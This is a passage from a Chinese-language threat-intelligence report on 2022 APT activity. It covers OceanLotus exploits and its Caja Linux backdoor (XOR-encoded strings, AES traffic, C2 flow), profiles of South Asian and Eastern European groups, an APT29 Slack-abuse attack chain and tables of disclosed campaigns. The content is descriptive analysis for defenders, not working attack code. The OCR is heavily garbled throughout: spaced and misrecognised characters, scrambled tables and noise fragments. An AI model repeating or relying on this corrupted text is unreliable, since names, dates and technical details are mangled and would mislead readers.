在 渗透 攻击 和 横向 移动 过 程 中 ， 海 过 花 组 织 具备 漏洞 利用 的 能 力 ， 包 括 对 特定 产品 的 0day 漏洞 利用 。 
该 组 织 首先 借助 Nday 漏洞 撒 网 式 入 侵 境内 的 网 络 站 点 ， 取 得 权限 后 从 中 筛选 出 高 价值 目标 继续 渗透 ， 
并 将 其 他 攻陷 的 网 站 用 作 后 续 攻 击 活动 的 跳板 或 代理 。 在 过 往 攻击 活动 中 该 组 织 使 用 过 的 Oday 漏洞 包 
JE: 


。 针 对 某 终端 管理 软件 的 命令 执行 漏洞， 海 莲花 组 织 利用 此 漏洞 在 内 网 中 进行 漫游 ， 对 装 有 某 终端 和 
理 软件 的 机 器 执行 任意 命令 ; 


。 针 对 某 终端 管理 系统 服务 端 web 管理 页 面 的 命令 执行 漏洞 ; 


° 针对 某 杀 毒 软件 服务 端的 远程 命令 执行 漏洞 ， 海 莲花 组 织 使 用 该 漏洞 入 侵 杀 软 服务 器 端 ， 并 向 服务 
端 管理 下 的 所 有 机 器 下 发 木马 。 


2022 年 海 莲 花 组 织 针对 Linux 平台 的 攻击 武器 更 多 地 展现 在 世人 面前 ， 上 半年 Buni 后 门 曝光 ，11 月 奇 


安信 披露 的 海 莲花 组 织 适 应 多 体系 架构 的 Linux 木马 caja” 与 2018 年 被 Avast 曝光 的 Torii 僵尸 网 络 木 
BAE 
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Caja 木 马 用 到 的 关键 字符 串 全 部 用 硬 编码 的 固定 Key 值 进行 XOR 编码 处 理 , 在 运行 中 动态 解码 后 再 使 用 。 
而 网 络 流 量 加 密 则 结合 了 AES 加 密 算法 和 随机 XOR 编码 两 种 方式 。 该 后 门 执行 流程 如 下 所 示 。 


XOR 循环 解码 C&C 


连接 C&C 


获取 进程 文件 路 径 ， 
并 chdir 到 进程 文件 所 在 目录 


生成 上 线 包 Payload 


XOR 循环 解码 4 个 目录 ， 选 择 
2 个 可 写 目 录 ， 后 续 分 别 创建 
Lock 文件 和 存放 UUID == 
生成 上 线 包 Header 


对 上 线 包 Header 和 Payload 
分 别 进行 编码 、 加 密 
是 否 创建 守护 进程 


创建 守护 进程 发 送 上 线 包 ， 等待 C&C 回应 


检查 并 创建 接收 C&C 指令 ， 解 
单 例 Lock 文件 析 并 执行 恶意 指令 


[=] 4 一 4 十 
已 有 实例 运行 向 C&C 上 报 执行 结果 
获取 本 地 系统 、 用 户 


amie 收 到 终止 指令 
dece 或 发 生 其 他 异常 


重 命名 当前 进程 


. E] 3.6 caja 的 整体 执行 流程 


Caja 同样 采用 了 进程 伪装 的 手法 ， 调 用 prctl 函数 将 进程 名 称 修改 为 随机 字符 串 。(C2 服务 器 地 址 通过 固 
定 的 Key fÉ 0xFFABFACB 经 XOR 循环 解码 得 到 。 后 门 与 C2 服务 器 通信 时 ， 会 生成 随机 AES 密 钥 ， 再 
用 该 密 钥 加 密 通信 数据 。 


奇 安 信 威 胁 情报 中 心 整理 了 2022 年 度 东 南亚 地 区 APT 组 织 的 主要 攻击 活动 如 下 表 所 示 。 
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2022-01-12 


披露 机 构 : Netskope 
APT 组 织 : 海 莲花 
疑似 海 莲 花 组 织 利 用 恶 
意 Web 归档 文件 的 攻击 
活动 9! 


M 


T) 2022-06 4 


披露 机 构 : 绿 盟 
APT 组 织 : 海 莲花 


APT32 组 织 针对 我 国 关 
基 单 位 攻击 活动 分 析 外 


C2) 2022017 4 
披露 机 构 : 安 恒 
APT 组 织 : 海 莲花 
“ 海 莲花 ”APT 近期 攻 
击 样本 分 析 报告 2 


@ 2022-01-20 
披露 机 构 : 奇 安信 
APT 组 织 : 海 莲花 
疑似 海 莲花 组 织 利用 
Glitch 平台 的 攻击 样本 
再 现 [76] 


M 


C2) 20220723 4 


披露 机 构 : 知道 创 宇 
APT 组 织 : 海 莲花 


近期 APT32 ( 海 莲花 ) 组 
织 攻 击 活动 样本 分 析 中 


C2) 2022-11-02. 


披露 机 构 : 微 步 在 线 
APT 组 织 : 海 莲花 

“ 海 莲 花 ” 组 织 运营 的 
物 联 网 僵尸 网 络 Toriie 


全 表 3.7 2022 年 东南 亚 地 区 APT 组 织 热点 攻击 活动 


Y 


C) 20220920 4 


GEZmIB 


QEZED 


o 
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披露 机 构 : 深信 服 
APT 组 织 : 海 莲花 
海 莲花 组 织 疑 似 针 对 越 
南 地 区 的 攻击 文件 分 析 


[77] 


披露 机 构 : 深信 服 
APT 组 织 : 海 莲花 
疑似 海 莲 花 组 织 攻 击 活 
动 样本 溯源 分 析 71 


披露 机 构 : 奇 安 信 
APT 组 织 : 海 莲花 

海 莲花 组 织 近 期 攻击 手 
法 披露 


C2) 2022-04-02. 


Y 


披露 机 构 : 360 

APT 组 织 : 海 莲 花 

海 莲花 组 织 攻击 活动 动 
态 浅 析 US 


C2) 20220901 1 


披露 机 构 : 微 步 在 线 
APT 组织: 海 莲 花 

海 莲花 组 织 Linux 平台 后 
门 Buni ik P 
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南亚 地 区 的 组 织 与 行动 
oS 


根据 2022 年 公开 报告 整理 结果 ， 活 跃 于 南亚 地 区 的 APT 组 织 依然 是 该 地 区 的 几 个 老牌 APT 组 织 ， 即 
35888. £ft. Sidewinder 和 摩 词 草 。 此 外 ， 我 们 发 现 了 该 地 区 一 个 新 的 APT 组 织 一 一 金刚 象 
(VajraEleph) 。 表 3.8 为 2022 年 南亚 地 区 活跃 的 APT 组 织 简 介 。 


南亚 APT 组 织 攻击 能 


[EE 十 十 
曹 灵 花 / BITTER E 
肚 脑 虫 / Donot Team + 
响尾蛇 / SideWinder ++ 
Bem t 
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2013 2016 k 216 ON 


Y 


区 


2021 


Y 


摩 词 草 

最 早 活动 时 间 : 2009 
公开 披露 时 间 : 2013 
主要 针对 中 国 、 巴 基 斯 坦 等 亚洲 地 区 国 
家 ， 以 政府 、 军 事 、 电 力 、 工 业 、 外 
和 经 济 等 领域 为 主 窃取 敏感 信息 。 
备 Windows, Android, macOS 三 
台 攻 击 能 力 。 奇 安信 内 部 跟踪 编号 


APTQ-36 


交 
具 
平 
为 


BR c 

最 早 活动 时 间 : 2016 

公开 披露 时 间 : 2017 

主要 针对 巴基斯坦 、 中 国 、 斯 里 兰 
卡 等 南亚 地 区 国家 ， 对 政府 机 构 、 
国防 军事 部 门 以 及 商务 领域 重要 人 士 
实施 网 络 间谍 活动 。 主 要 使 用 yty 和 
EHDevel 两 套 恶 意 框架 。 奇 安信 内 部 
跟踪 编号 为 APT-Q-38 


摩 耶 象 

最 早 活动 时 间 : 2017 

公开 披露 时 间 : 2021 

该 组 织 以 使 用 动态 域名 进行 钓鱼 著称 ， 
其 与 蔓 灵 花 、 魔 罗 检 等 组 织 存在 网 络 资 
产 共享 的 情况 。 善 于 利用 鱼 叉 邮 件 针对 
中 国 、 尼 泊 尔 、 巴 基 斯 坦 进行 钓鱼 攻击 ， 
极 少 投递 木马 ， 整 体 水 平 较 弱 。 


A. 表 3.8 2022 年 南亚 地 区 活跃 APT 组 织 


Y 


= 二 一 一 一 一 二 二 二 二 二 忆 二 二 二 


Y 


最 早 活动 时 间 : 2013 

\ 开 披露 时 间 : 2016 

要 针对 巴基斯坦 、 中 国 两 国 ， 其 攻 
目标 为 政府 部 门 、 电 力 、 军 工业 相 
单位 ， 意 图 窃取 敏感 资料 ， 并 与 摩 

启 草 、 魔 罗 检 存 在 关联 。 奇 安信 内 部 

跟踪 编号 为 APT-Q-37 


AK H H. h> 


aj 


w 2018 


Sidewinder 

最 早 活 动 时 间 : 2012 

公开 披露 时 间 : 2018 

主要 针对 巴基斯坦 、 中 国 、 阿 富 汗 、 
尼泊尔 、 孟 加 拉 等 国家 展开 攻击 ， 旨 
在 窃取 政府 外 交 机 构 、 国 防 军 事 部 门 、 
高 等 教育 机 构 等 领域 的 机 密 信息 。 常 
使 用 已 知 漏洞 (CVE-2017-11882) F 
展 攻击 活动 。 奇 安信 内 部 跟踪 编号 为 


APT-Q-39 


VajraEleph 

最 早 活动 时 间 : 2021 

公开 披露 时 间 : 2022 

该 APT 组 织 最 早 的 攻击 活动 可 以 追溯 到 
2021 年 6 月。 疑似 来 自 南 亚 ， 主 要 针对 
巴基斯坦 军 方 展开 了 有 组 织 、 有 计划 、 
针对 性 的 军事 间谍 情报 活动 。 其 攻击 目 
标 主要 为 巴基斯坦 国家 的 边防 军 (FC) 
和 特种 部 队 (SSG) ， 尤 其 是 伟 路 支 省 
边防 军 (FC BLN) ， 此 外 还 包含 少量 的 
联邦 调查 局 (FIA) 和 警察 (Police) 。 
奇 安信 内 部 跟踪 编号 为 APT-Q-43 


媳 一 = 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 二 一 一 一 二 


《好 > 奇 安 信 威 胁 情报 中 心 


Transparent Tribe 

最 早 活 动 时 间 : 2012 

公开 披露 时 间 : 2016 
主要 针对 印度 政府 、 军 队 或 相关 组 织 ， 
以 及 巴基斯坦 的 激进 分 子 和 民间 社 
会 ， 利 用 社会 工程 学 进行 鱼 叉 攻击 ， 


同时 也 会 在 移动 端 发 起 攻击 


Y 


SideCopy 

最 早 活 动 时 间 : 2019 

公开 披露 时 间 : 2020 

主要 针对 印度 、 巴 基 斯 坦 和 阿富汗 ， 以 
政府 、 国 防 、 军 事 等 相关 组 织 人 员 为 目 
标 进行 网 络 间谍 活动 。 因 其 攻击 手法 主 
要 复制 Sidewinder 及 其 他 APT 组 织 的 
TTP 而 得 名 
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从 2022 年 全 年 的 公开 报告 所 披露 的 活动 来 看 ， 南 亚 地 区 各 APT 组 织 活跃 度 较 往年 并 未 出 现 太 大 波动 ， 
其 中 葛 灵 花 、 了 响尾蛇、 摩 词 草 以 及 透明 部 落 一 直 处 于 高 度 活路 的 状态 。 


2022 年 6 月 ， 奇 安信 威胁 情报 中 心 捕获 到 蔓 灵 花 APT 组 织 模仿 军 贸 客户 (孟加拉 海军 ) 以 维修 船体 声 
纳 和 推销 反 无 人 机 系统 为 诱 钼 主题 的 针对 军工 行业 的 攻击 活动 "5。 攻 击 者 通过 诱导 受害 者 下 载 钓 鱼 邮 
件 的 恶意 附件 从 而 植 入 后 续 木 马 。 葛 灵 花 组 织 此 次 使 用 的 攻击 链 与 2021 年 5 月 份 所 披露 的 基于 .NET 远 
控 木马 执行 命令 或 者 下 发 插件 的 攻击 链 高 度 一 致 ， 并 且 相 关 模 块 的 免 杀 处 理 没有 明显 改进 。 


透明 部 落 组 织 在 2022 年 仍 是 南亚 地 区 活跃 程度 最 高 的 APT 组 织 ， 该 组 织 以 印度 政府 、 军 队 、 外 交 部 门 
等 组 织 机 构 为 主要 攻击 目标 。2022 年 4 月 ， 奇 安信 威胁 情报 中 心 披露 透明 部 落 组 织 利 用 走私 情报 相关 
诱 钼 针对 印度 的 攻击 活动 ""。 此 次 攻击 活动 中 ， 透 明 部 落 组 织 采 取 了 和 之 前 活动 相似 的 攻击 链 一 一 利用 
携带 恶意 安 的 诱饵 文档 释放 .NET 恶意 软件 。 


摩 词 草 组 织 在 2022 年 发 起 了 多 起 针对 巴基斯坦 政府 部 门 、 国 防 机 构 等 目标 的 攻击 活动 。2022 年 5 月 ， 
奇 安信 威胁 情报 中 心 披露 了 摩 词 草 组 织 相关 攻击 活动 ， 所 用 的 BADNEWS 木马 携带 了 被 窃取 的 签名 
“5Y TECHNOLOGY LIMITED”。 截至 10 HIE, 摩 启 草 组 织 仍 在 使 用 该 签名 对 攻击 组 件 进行 伪装 。 期 间 ， 
该 组 织 使 用 多 种 不 同 的 感染 方式 对 目标 进行 攻击 , 例如 在 入 侵 了 某 个 使 用 WordPress 管理 系统 的 网 站 后 ， 

将 BADNEWS 变种 木马 挂 载 于 网 站 上 。 


金刚 象 (VajraEleph) 是 我 们 在 2022 年 新 发 现 的 一 个 对 Android 平台 进行 攻击 的 APT 组 织 ， 该 组 织 疑 
似 具 有 南亚 背景 ， 主 要 针对 巴基斯坦 军 方 展开 间谍 情报 活动 中。 自 2021 年 6 月 起 ， 金 刚 象 组 织 针对 巴 
基 斯 坦 军 方 展 开 了 有 组 织 、 有 计划 、 针 对 性 的 军事 间谍 情报 活动 。 在 为 期 9 个 月 的 攻击 活动 中 ， 受 害 者 
包括 巴基斯坦 国家 边防 军 、 特 种 部 队 、 联 邦 调查 局 以 及 警察 在 内 的 数 十 名 人 员 。 


E 全 球 高 级 持续 性 威胁 (APT) 2022 年 度 报告 


«(9 奇 安信 威胁 情报 中 心 


E LIN 


| We ` saara aoea - 0 


A 图 3.9 巴基斯坦 边防 军 (FC, Frontier Corps) 人 员 被 窃 照 片 


该 组 织 投 入 攻击 的 RAT 都 是 针对 Android 平台 ， 我 们 将 其 使 用 的 Android 平台 RAT 命名 为 VajraSpy。 
VajraSpy 支持 间谍 活动 的 所 有 经 典 功能 ， 并 将 窃取 到 的 数据 存储 到 指定 的 谷歌 云 存 储 空间 中 。 通 过 对 该 
组 织 的 攻击 手法 进行 分 析 我 们 发 现 ， 该 组 织带 有 明显 的 军事 情报 窃取 意图 ， 擅 长 使 用 社交 诱导 投递 和 短 
言 诱导 投递 进行 攻击 ， 攻 击 链 中 存在 一 些 与 肚 脑 虫 APT 组 织 相似 的 特征 。 


根据 2022 年 全 年 公开 报告 显示 ， 响 尾 蛇 APT 组 织 也 保持 着 较 高 的 活跃 度 ， 期 间 先 后 发 起 了 针对 巴 基 斯 
坦 政府 部 门 和 电信 部 门 的 假冒 “巴基斯坦 政府 内 阁 秘 书 处 ， 内 阁 部 门 国家 电信 和 信息 技术 安全 委员 会 ” 
的 钓鱼 攻击 “"、 利 用 巴基斯坦 国庆 作为 诱饵 的 钓鱼 活动 ““、 模 仿 巴 基 斯 坦 政府 合法 域 的 攻击 活动 ""、 
利用 WarHawk 后 门 攻击 巴基斯坦 国家 电力 监管 局 的 活动 U SE, 


下 表 总 结 了 上 述 南亚 地 区 APT 组 织 在 2022 年 的 主要 攻击 活动 。 
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披露 时 间 


Bun 


摩 词 草 


摩 词 草 


响尾蛇 


肚 脑 虫 


SideCopy 


透明 部 落 


透明 部 落 


响尾蛇 


SRE 


透明 部 落 


金刚 象 


SRE 


透明 部 落 


LY 


ELIT 


= + 


摩 词 草 


E aC. 响尾蛇 、 
摩 耶 象 


透明 部 落 


隐藏 在 账单 下 的 恶意 一 一 APT-C-08 (SRE) 最 新 攻击 活动 简报 


Patchwork 利用 钓鱼 攻击 投放 BADNEWS 木马 新 变种 95) 


Patchwork APT 组 织 针对 某 医疗 卫生 机 构 相 关 人 员 与 巴基斯坦 国防 官员 攻 
击 活动 分 析 °° 


SideWinder 假冒 “巴基斯坦 政府 内 阁 ” 进 行 钓鱼 活动 外 


Donot 组 织 持续 攻击 南亚 政府 和 军事 组 织 99 


“SideCopy” 武 器 库 更 新 : 基于 Golang 的 Linux 窃 密 工具 浮 出 水 面 四 


Packer? 对 抗 ? “透明 部 落 ” 正 在 寻求 CrimsonRAT 的 新 出 路 P? 
百 密 一 疏 ， 透 明 部 落 与 SideCopy 共用 基础 设施 露出 马 脚 PU 
南亚 国家 背景 APT 组 织 “ 响 尾 蛇 ”发 起 春季 攻势 7 


疑似 BITTER APT 组 织 利 用 尼泊尔 建 军 节 相 关 诱 乌 攻 击 巴 基 斯 坦 政 府 及 核能 
人 员 


Transparent Tribe 模仿 军事 国防 组 织 的 虚假 域 ， 以 攻击 印度 官员 


来 自 南 亚 的 金刚 象 组 织 VajraEleph 一 一 针对 巴基斯坦 军 方 人 员 的 网 络 间谍 
活动 披露 


疑似 蔓 灵 花 组 织 通过 巴基斯坦 政府 机 构 作 为 跳板 攻击 孟加拉 国 °°! 


“透明 部 落 ” 利 用 走私 情报 相关 诱饵 针对 印度 的 攻击 活动 分 析 ° 


推陈出新 ， 蔓 灵 花 组 织 攻击 模块 再 升级 P7 


BITTER 以 新 的 恶意 软件 瞄准 孟加拉 国 P9 


SideWinder 最 新 攻击 活动 使 用 全 新 的 攻击 方式 和 流程 ” 


SideWinder 组 织 模仿 巴基斯坦 政府 合法 域 发 起 攻击 00 


摩 词 草 组 织 以 巴基斯坦 相关 政府 机 构 文 件 为 诱饵 的 攻击 活动 分 析 0071 


近期 南亚 地 区 APT 组 织 攻击 活动 分 析 007 


透明 部 落 ” 组 织 伪装 印度 国防 部 邮件 攻击 3 


A. 表 3.10 2022 年 南亚 地 区 APT 组 织 热点 攻击 活动 *1 


2022-01-10 


2022-01-10 


2022-01-10 


2022-01-18 


2022-01-18 


2022-01-19 


2022-01-29 


2022-02-17 


2022-02-18 


2022-03-11 


2022-03-30 


2022-03-31 


2022-04-24 


2022-04-29 


2022-05-05 


2022-05-12 


2022-05-18 


2022-06-01 


2022-06-01 


2022-06-08 


2022-06-21 


360 


Malwarebytes 


[uf 


ze 


深信 服 


微 步 在 线 


Cisco 


360 


Group-IB 
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活动 描述 披露 时 间 
摩 词 草 疑似 摩 启 草 组 织 针对 巴基斯坦 的 两 起 攻击 行动 0" 2022-06-30 FE 
BUE Bitter APT 使 用 较 新 的 恶意 软件 “Almond RAT” 攻 击 孟加拉 国 no 2022-07-04 Secuinfra 
SideCopy SideCopy 近期 利用 LNK 文件 针对 印度 地 区 的 攻击 活动 09 2022-07-12 =E 
透明 部 落 透明 部 落 在 最 新 活动 中 开始 针对 教育 部 门 50 2022-07-13 Cisco 
响尾蛇 疑似 Sidewinder APT 成 功 对 巴基斯坦 军事 目标 进行 网 络 攻击 09 2022-07-14 CheckPoint 
透明 部 落 透明 部 落 以 “清洁 运动 ”为 主题 对 印度 国防 部 下 属 企业 发 起 钓鱼 攻击 1091 2022-07-25 安 恒 
BL Bitter APT 组 织 使 用 “Dracarys”Android 间谍 软件 加 2022-08-09  Cyble 
PERAR Donot 组 织 YTY 框架 最 新 变化 分 析 中 2022-08-11 ^ Morphisec 
[33 南亚 Patchwork APT 组 织 新 活动 特点 分 析 5 2022-08-16 ”知道 创 宇 
响尾蛇 响尾蛇 (APT-Q-39) 组 织 以 巴基斯坦 内 政 部 文件 为 诱 乌 的 攻击 活动 77 2022-08-26 FZS 
Bud 蔓 灵 花 最 新 远 控 组 件 wmRAT 分 析 07 2022-08-29 360 
响尾蛇 响尾蛇 (SideWinder) 近期 攻击 样本 7 2022-09-00 =s 
响尾蛇 APT 组 织 SideWinder 利用 WarHawk 后 门 攻击 巴基斯坦 P9 2022-10-21  Zscaler 
摩 词 草 PatchWork 组 织 Herbminister 行动 武器 库 揭秘 9 2022-10-24 Amel 
[33 APT-Q-36: 南亚 摩 词 草 组 织 近 期 武器 库 迭 代 更 新 分 析 1” 2022-10-27  ” 奇 安信 
[33 白 象 APT 组 织 利用 BADNEWS 木马 攻击 中 国 科研 院 校 上 2022-10-27 ZK 
透明 部 落 Transparent Tribe 组 织 利用 新 TTP MITREDEN 2022-11-03  Zscaler 
摩 词 草 摩 订 草 组 织 再 次 袭击 巴基斯坦 " 2022-11-23 360 
响尾蛇 响尾蛇 组 织 近期 攻击 活动 简报 1 2022-12-15 奇 安 信 
SideCopy SideCopy 针对 印度 政府 官员 进行 网 络 攻击 77 2022-12-22 Securonix 
透明 部 落 APT-C-56 (透明 部 落 ) 利用 外 贸 链接 伪装 文档 攻击 分 析 2022-12-30 360 


A. 3 3.10 2022 年 南亚 地 区 APT 组 织 热点 攻击 活动 *2 
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东欧 地 区 的 组 织 与 行动 
Eastern Europe 


2022 年 伊始 ， 伴 随 着 俄 乌 冲突 爆发 和 有 恶化， 东欧 地 区 针对 乌克兰 国家 的 APT 活动 变 得 十 分 频繁 ， 其 中 
老牌 APT 组 织 APT28、APT29、Gamaredon、Sandworm 悉数 亮相 ，UAC-0056 和 UNC1151 等 组 织 
也 在 俄 乌 冲 突 期 间 表现 得 极为 活跃 。 除 了 乌克兰 ， 东 欧 地 区 的 APT 组 织 还 把 目光 放 在 其 他 国家 上 ， 展 开 
了 不 间断 的 网 络 间谍 活动 。 表 3.11 为 2022 年 东欧 地 区 活跃 的 APT 组 织 简介 。 


APT28 
APT29 
Turla 十 十 十 
Gamaredon 十 

Energetic Bear 


《te > 奇 安信 威胁 情报 中 心 
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wa VENE 7 NNNNNND. 


| APT29 APT28 

! 最 早 活动 时 间 : 2008 最 早 活动 时 间 : 2004 

| 公开 披露 时 间 : 2013 公开 披露 时 间 : 2014 

| APT29 组 织 的 主要 目标 为 西亚 、 中 | APT28 组 织 历史 活动 非常 频繁 ， 主 
， 亚 、 东 非 和 中 东 的 政府 部 门 和 机 构 。 ”， 要 针对 政府 ， 军 事 和 安全 组 织 ， 相 关 
， 其 被 认为 在 2015 年 夏季 攻击 了 美国 ， 攻 击 覆 盖 Windows. Linux. Mac. 
| DNC， 近 年 来 不 断 针 对 多 国外 交 机 构 “，Android 和 i0S， 其 在 2016 年 企图 
| 发 起 攻击 干扰 美国 大 选 ， 在 2022 年 上 半年 被 
Y 披露 发 动 了 针对 美国 国防 承包 商 的 攻 
击 ， 俄 乌 冲突 中 多 次 向 乌克兰 投放 恶 
意 软 件 


2015 w. 2018 


Turla 

最 早 活 动 时 间 : 2007 

公开 披露 时 间 : 2014 

该 组 织 拥 有 非常 复杂 的 TTP， 其 受害 
者 覆盖 超过 45 个 国家 ， 常 针对 政府 、 
大 使 馆 、 军 事 、 教 育 、 研 究 和 制药 公 
司 实 施 鱼 叉 和 水 坑 攻 击 


e 


wd Hna M m de 


InvisiMole 

最 早 活动 时 间 : 2013 

公开 披露 时 间 : 2018 

InvisiMole 于 2018 年 6 月 被 国外 安 
全 厂商 ESET 披露 ， 至 少 自 2013 年 
开始 活跃 。 该 组 织 和 Gamaredon 组 
织 存 在 合作 ， 曾 发 现 Gamaredon 
的 .NET 下载 器 下 载 执 行 了 InvisiMole 
的 TCP 下 载 器 。 


wa wm w 


Callisto UNC1151 UAC-0056 

最 早 活动 时 间 : 2015 最 早 活动 时 间 : 2017 最 早 活动 时 间 : 2020 

公开 披露 时 间 : 2018 公开 披露 时 间 : 2020 公开 披露 时 间 : 2022 

Callisto 组 织 攻 击 目标 包括 欧洲 和 南 该 APT 组 织 据 称 与 “Ghostwriter 又 名 Lorec53 (中 文 名 称 : 洛 瑞 熊 ) ， 
高 加 索 的 军事 人 员 、 政 府 官员 、 智 囊 攻击 活动 相关 ， 对 包括 立陶宛 、 拉 脱 该 组 织 最 早 的 攻击 活动 可 以 追溯 到 
团 和 记者 ， 主 要 收集 与 东欧 和 南 高 维 亚 和 波兰 等 北约 相关 国家 实施 网 络 2020 年 6 月 ， 主 要 以 乌克兰 、 格 鲁 


Sandworm 

最 早 活动 时 间 : 2009 

公开 披露 时 间 : 2015 

Sandworm 组 织 大 约 从 2009 年 开始 
运营 ， 主 要 针对 与 能 源 、 工 业 控 制 系 
统 、SCADA、 政 府 和 媒体 相关 领域 的 
乌克兰 实体 ， 在 2022 年 俄 乌 冲突 中 
策划 了 针对 乌克兰 电网 的 攻击 


Gamaredon 

最 早 活动 时 间 : 2013 

公开 披露 时 间 : 2015 

主要 针对 乌克兰 执法 部 门 、 政 府 机 构 
和 军事 力量 进行 间谍 活动 和 情报 收集 
等 攻击 。Operation Armageddon 行 
动 与 该 组 织 有 关 ，2022 年 上 半年 频繁 
向 乌克兰 发 起 网 络 钓鱼 攻击 


一 一 二 一 一 一 一 一 二 二 一 一 人 
dde ome UY ua 


Y 


加 索 地 区 的 外 交 和 安全 政策 有 关 的 情 钓鱼 攻击 吉 亚 为 目标 ， 其 攻击 活动 带 有 明显 的 
报 。 政治 意图 


Y 


Y Y 


A. 4 3.11 2022 年 东欧 地 区 活跃 APT 组 织 
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总 览 2022 年 东欧 地 区 所 发 生 的 攻击 活动 ， 鱼 叉 式 钓鱼 邮件 的 攻击 方式 仍然 是 东欧 地 区 APT 组 织 常用 的 
一 种 攻击 手段 ， 在 俄 乌 冲突 中 Gamaredon、UAC-0056 频繁 对 乌克兰 相关 组 织 机 构 发 起 网 络 钓鱼 攻击 ， 
APT28. APT29. Turla, UNC1151 的 钓鱼 攻击 目标 还 涉及 到 东欧 其 他 国家 和 欧盟 北约 的 成 员 国 ， 并 且 
这 些 组 织 所 采取 的 攻击 方式 和 攻击 技术 在 这 期 间 也 在 不 断 改 进 优化 ， 例 如 APT29 借助 合法 的 网 络 服务 创 
建 C&C 信道 0146 ， 以 绕 过 流量 检测 并 增加 攻击 活动 的 隐蔽 性 。 


2022 年 7 月 ， 奇 安信 威胁 情报 中 心 红 雨滴 团队 在 日 常 的 威胁 狩猎 中 捕获 到 EnvyScout 攻击 样本 093, 
该 样本 释放 的 ISO 文件 中 包含 LNK 文件 以 及 设置 了 文件 隐藏 属性 的 PE 文件 ，LNK 文件 启动 其 中 的 正常 
EXE， 进 而 以 侧 加 载 方式 执行 恶意 DLL。 恶 意 DLL 利用 团队 协作 通信 服务 Slack 作为 C&C 信道 ， 获 取 后 
续 载 荷 并 执行 。 在 进行 溯源 分 析 后 ， 我 们 确定 此 活动 是 APT29 以 COVID-19 疫苗 接种 为 诱 乌 针对 意大利 
的 定向 攻击 ， 并 且 攻 击 活动 至 少 于 6 月 中 旬 发 起 。 此 次 活动 的 完整 攻击 流程 如 下 : 


人 3' slack 


hxxps://www[. x ]rs/i.htmi hxxps://slack.com/api/ 


hxxps-//files.slack.com/ 
ENK 启动 
Decret.Ink 


E 诱饵 文档 Decret.iso HP2.exe | 加 载 C&C 


dl: : 
(& 


HPScanApi.dll 


A. 图 3.12 APT29 滥用 Slack 服务 针对 意大利 的 攻击 流程 59] 


在 2022 年 期 间 ，Gamaredon 组 织 以 乌克兰 政府 、 军 队 、 非 政府 组 织 、 司 法 机 构 以 及 非 营利 组 织 等 为 目 
标 先后 发 起 了 针对 乌克兰 卢 甘 斯 克 地 区 的 网 络 钓鱼 活动 上 5、 利 用 乌克兰 战争 为 主题 的 网 络 钓鱼 活动 1291. 
以 “前 线 武装 、 占领 区 相关 管理 人 员 的 奖赏 补贴 和 管理 费用 的 预算 账单 说 明 ” 为 主题 的 针对 乌克兰 的 攻 
击 活 动 " 久 、 利 用 开源 DDoS 木马 程序 “LOIC” 的 DDoS 攻击 活动 "站 、 对 北约 成 员 国 某 大 型 炼油 公司 
的 入 侵 活 动 "9 等。 在 Gamaredon 组 织 历次 的 活动 中 ， 我 们 观察 到 该 组 织 在 攻击 活动 中 对 自身 攻击 武 
器 不 断 进行 优化 和 升级 ， 同 时 也 提高 了 攻击 活动 的 频率 。 


Sandworm 组 织 被 认为 是 Cyclops Blink 恶意 软件 的 幕后 黑手 U, AERA MA SOHO 网 络 ; 
备 创建 僵尸 网 络 。2022 年 4 月 ， ee eg DUE 
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划 针 对 乌克兰 电网 的 攻击 P7, 


奇 安 信 威 胁 情报 中 心 整理 了 2022 年 东欧 


«9» 奇 安信 威胁 情报 中 心 


在 此 次 


活动 描述 


欠 攻 击 中 出 现 的 针对 电力 工控 系统 的 恶意 
Sandworm 组 织 在 2016 攻击 乌克兰 电力 系统 时 使 用 的 Industroyer 的 变种 ， 同 时 该 组 织 还 
CaddyWiper 和 Linux/Solaris 平台 的 数据 擦 除 软件 让 受 感染 的 系统 难以 恢复 。 


次 地 区 APT 组 织 热点 攻击 活动 ， 如 下 表 所 示 : 


披露 时 间 


软件 Industroyer2 是 


不 计划 使 用 


APT28 


APT29 


Gamaredon 


Gamaredon 


UAC-0056 


APT28 


Sandworm 


UAC-0056 


Gamaredon, UAC- 
0056 


Gamaredon 


Turla 


UNC1151 


UNC1151 


Gamaredon 


InvisiMole 


UAC-0056 


Turla 


Gamaredon 


Sandworm 


APT29 


疑似 APT28 利用 CVE-2021-40444 漏洞 针对 西亚 和 东欧 高 级 政府 官员 的 
网 络 间谍 活动 


APT29 在 StellarParticle 活动 中 使 用 的 新 策略 和 技术 75 
Gamaredon 持续 对 乌克兰 进行 网 络 间谍 攻击 "5 


Gamaredon 针对 乌克兰 组 织 的 攻击 活动 798 


APT 组 织 LOREC53 CE BE) 近期 针对 乌克兰 的 大 规模 网 络 攻击 活动 


APT28 针对 美国 国防 承包 商 发 起 攻击 70 


Cyclops Blink 恶意 软件 与 Sandworm 组 织 有 关 
UAC-0056 针对 乌克兰 的 组 织 发 起 鱼 叉 式 网 络 钓鱼 攻击 "1 


俄 乌 战争 中 的 网 络 攻击 部 队 行为 分 析 077 


APT 组 织 Gamaredon 近期 在 乌克兰 卢 甘 斯 克 地 区 的 网 络 钓鱼 活动 “ 


寻找 在 野 的 Penquin 样本 999 


Asylum Ambuscade: 针对 管理 乌克兰 难民 后 勤 的 欧洲 官 
活动 ! 


疑似 APT 组 织 UNC1151 针对 乌克兰 等 国 的 攻击 活动 分 析 1351 


员 的 网 络 钓鱼 


APT-C-53 (Gamaredon) 在 近期 攻击 中 的 新 变化 9 
InvisiMole 组 织 针 对 乌克兰 国家 机 构 发 起 鱼 又 式 钓鱼 攻击 137 


UAC-0056 针对 乌克兰 实体 的 新 活动 分 析 "9 


Process Manager: 5 Turla APT 组 织 有 关 的 Android 恶意 软件 


乌克兰 发 现 与 Gamaredon 组 织 有 关 的 网 络 钓鱼 攻击 活动 99 


Sandworm 组 织 试 图 攻击 乌克兰 能 源 供应 商 P7 


APT29 针对 以 色 列 大 使 馆 的 恶意 文档 7 


A. 表 3.13 2022 年 东欧 地 区 APT 组 织 热点 攻击 活动 *1 


2022-01-25 


2022-01-27 


2022-01-31 


2022-02-04 


2022-02-16 


2022-02-16 


2022-02-23 


2022-02-25 


2022-02-26 


2022-02-28 


2022-02-28 


2022-03-01 


2022-03-14 


2022-03-18 


2022-03-22 


2022-04-01 


2022-04-01 


2022-04-04 


2022-04-12 


2022-04-18 


trellix 
CrowdStrike 
Symantec 
Microsoft 
绿 盟 

CISA 


CISA 


PaloAlto 
Networks 


知道 创 宇 
绿 盟 
lab52.io 


Proofpoint 


360 


securityaffairs. 
co 


Malwarebytes 
lab52.io 
CERT-UA 
ESET 


